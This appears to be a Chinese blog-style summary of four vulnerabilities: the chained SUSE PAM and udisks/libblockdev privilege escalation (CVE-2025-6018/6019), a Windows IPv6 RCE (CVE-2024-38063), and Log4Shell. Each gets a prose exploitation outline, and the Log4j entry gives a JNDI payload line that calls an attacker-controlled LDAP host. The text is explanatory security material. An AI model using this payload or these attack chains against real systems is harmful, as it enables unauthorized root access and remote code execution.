CVE-2025-6018
漏洞介绍:
该漏洞是Linux PAM(可插拔认证模块)中的一个本地权限提升漏洞,主要存在于openSUSE Leap 15和SUSE Linux Enterprise 15的PAM配置中。由于PAM规则错误地将检查条件设置为用户存在SSH或TTY会话,而非用户实际在物理控制台前操作,导致非特权攻击者能够通过篡改环境变量,绕过Polkit的“allow_active”信任区域,从而获取“allow_active”权限。
漏洞利用方法:
攻击者可以通过SSH登录目标系统,利用PAM配置错误,使自己的会话被标记为“active seat”,从而获得“allow_active”权限。
CVE-2025-6019
漏洞介绍:
该漏洞是libblockdev库中的一个本地权限提升漏洞,影响几乎所有主流Linux发行版,包括Ubuntu、Debian、Fedora、openSUSE等。由于udisks守护进程在挂载文件系统时会调用libblockdev库,而该库在挂载时未使用nosuid和nodev标志,导致拥有“allow_active”权限的用户可以利用此漏洞获取root权限。
漏洞利用方法:
攻击者可以利用udisks的挂载功能,例如通过挂载带有SUID-root shell的任意XFS镜像,并请求udisks守护进程调整文件系统大小,由于挂载时未使用nosuid和nodev标志,攻击者可以执行SUID-root shell,最终获得root权限 。
这两个漏洞可以被串联利用,形成完整的攻击链。攻击者首先利用CVE-2025-6018获取“allow_active”权限,然后利用CVE-2025-6019进一步提升权限至root,从而完全控制系统。
CVE-2024-38063
漏洞介绍:
CVE-2024-38063是一个存在于 Windows TCP/IP 堆栈中的高危远程代码执行漏洞,CVSS 评分为 9.8。漏洞源于 Windows 在处理 IPv6 数据包时的整数下溢问题,攻击者可发送特制的 IPv6 数据包触发漏洞,进而实现远程代码执行或导致拒绝服务攻击。该漏洞影响范围广泛,包括 Windows 10、Windows 11 以及多个版本的 Windows Server。
漏洞利用方法:
攻击者需要构造特制的 IPv6 数据包并发送给目标系统。利用漏洞需深入理解 Windows TCP/IP 协议栈处理数据包的机制,特别是 IPv6 扩展头的处理方式。通过精心设计数据包的偏移和头字段,可在数据包重组过程中引发缓冲区溢出,最终实现远程代码执行。目前虽有概念验证代码发布,但微软暂无证据表明该漏洞在野外被积极利用。
Apache Log4j2
漏洞介绍:
Apache Log4j2是一个基于 Java 的开源日志记录工具,广泛应用于业务系统开发。2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Log4j2 远程代码执行漏洞。该漏洞是由于 Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限,影响范围广泛,危害程度高。
漏洞利用方法:
攻击者需要构造恶意的 JNDI 注入数据包,例如通过记录的 HTTP 请求头(如 User-Agent)或表单参数等,向目标服务器发送类似 ${jndi:ldap://恶意URL/POC} 的 Payload。目标服务器的 Log4j2 组件会解析此数据并连接到攻击者控制的 LDAP 或 RMI 服务,下载恶意的 Class 文件并在本地加载执行,从而实现远程代码执行。
在实际操作中,可以利用工具如 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 创建监听,构造并发送包含恶意 JNDI 注入的请求到目标服务器。如果漏洞存在,目标服务器会连接到攻击者的监听服务,攻击者即可发送恶意类文件,利用漏洞获得服务器的控制权限。
结语
可以被生活打败
决不能被生活打倒
!!!